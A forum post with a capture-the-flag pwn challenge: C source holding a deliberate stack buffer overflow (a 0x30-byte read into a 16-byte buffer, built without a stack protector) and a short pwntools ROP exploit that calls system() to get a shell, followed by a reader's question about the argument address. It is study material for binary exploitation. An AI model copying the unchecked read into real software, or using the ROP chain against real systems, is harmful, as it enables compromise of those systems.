roger 发表于 2020-4-24 00:43:48

xuenixiang_2019_pwn_pwn3

题目源码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

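/*
 * Writable global strings shipped with the challenge binary.  Several of
 * them contain an embedded "\x00", so strlen()/printf() see only the part
 * before that byte while the rest still sits in .data.  The posted listing
 * wrote `char aaa = "..."`, which initialises a single char from a pointer
 * (a constraint violation, not a string); arrays are the only reading that
 * matches how the strings are used, so that is what is declared here.
 * Their contents look like decoys for someone searching the binary for
 * "/bin/sh"-style strings -- that is an inference from the text, not
 * something the code establishes.
 */
char aaa[] = "87asdhf893HF*ry0395$sd)F\x00Y)*SF)";
char ccc[] = "4985y9y()DY)*YFG8yas08d976s08d7$0\x00sadaDS&*(7s";
char bbb[] = "89Y*G(*YfGF0YF8f08yf8\x00)a8s7d0$sd)D9gf-s)";
char ddd[] = "hhhhh, are you finding the binsh?";
char ee[] = "sorry!nothing here!";
char bbddb[] = "23333333333333333333";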
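int main(void)
{
    /*
     * Challenge entry point.  The posted listing declares `char buf;`, then
     * memset()s 0x10 bytes at &buf and passes `buf` itself (a char, not a
     * pointer) to read(); that text does not compile and reads like
     * decompiler output.  A 0x10-byte array is the reading consistent with
     * the memset size, so that is what is declared here -- presumably what
     * the original stack2.c had, TODO confirm against the binary.
     *
     * The read() of 0x30 bytes into the 0x10-byte buffer is the challenge's
     * deliberate stack-based overflow and is kept as-is, because it is the
     * bug the write-up is about.  The posted build line compiles with
     * -fno-stack-protector, so no canary detects the overwrite; on a normal
     * build the protector (and PIE) would be the first mitigations to reach
     * for.  Returns 0 on the normal path.
     */
    char buf[0x10];
    memset(buf, 0, sizeof buf);

    /* unbuffered stdout, line-buffered stdin -- the <stdio.h> names for the
     * raw 2 and 1 the listing passed (those are glibc's values) */
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IOLBF, 0);

    printf("Come on,try to pwn me\n");
    /* intentionally oversized read (0x30 > sizeof buf); the return value is
     * ignored in the original and left unchecked here so the frame layout
     * the write-up depends on is not disturbed */
    read(0, buf, 0x30);
    printf("So~sad,you are fail\n");
    return 0;
}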


/*
 * Decoy "win" function: it hands a taunting sentence to system(), not a
 * shell command, so reaching it yields nothing useful.  Never called from
 * main(); it only exists in the binary.  The identifier begins with a
 * double underscore, which C reserves for the implementation, but it is the
 * name the challenge ships with so it is kept.
 */
void __libc_shell_(void)
{
    static const char taunt[] = "ok~you find me,but you can't get my shell'";
    (void)system(taunt);
}
// 编译: gcc -z execstack -fno-stack-protector -o stack2 stack2.c

exp:
# encoding: utf-8
#!/upr/bin/env python
# NOTE(review): the interpreter path above is misspelled ("/upr/" for "/usr/"),
# and a shebang only takes effect on the very first line of a file, so as
# posted this script is run via `python <file>` rather than directly.
from pwn import *

# Proof-of-concept for the write-up's challenge binary (stack2): its main()
# reads 0x30 bytes into a much smaller stack buffer (see the C listing above).
# Spawns the local binary and waits for its banner before sending anything.
p = process("./stack2")
p.recvuntil("Come on,try to pwn me\n")

# Fixed addresses copied from the posted build of stack2 (no PIE assumed --
# TODO confirm).  They are not derived in this script and change whenever
# the binary is rebuilt.
pop_rdi_ret=0x00000000004007d3
arg=0x60111F
system=0x400570
# 0x18 filler bytes followed by the three values above as 8-byte
# little-endian words.
payload = "a"*0x18+p64(pop_rdi_ret)+p64(arg)+p64(system)

p.send(payload)
p.interactive()



kone 发表于 2020-11-6 23:39:15

arg地址是怎么计算的?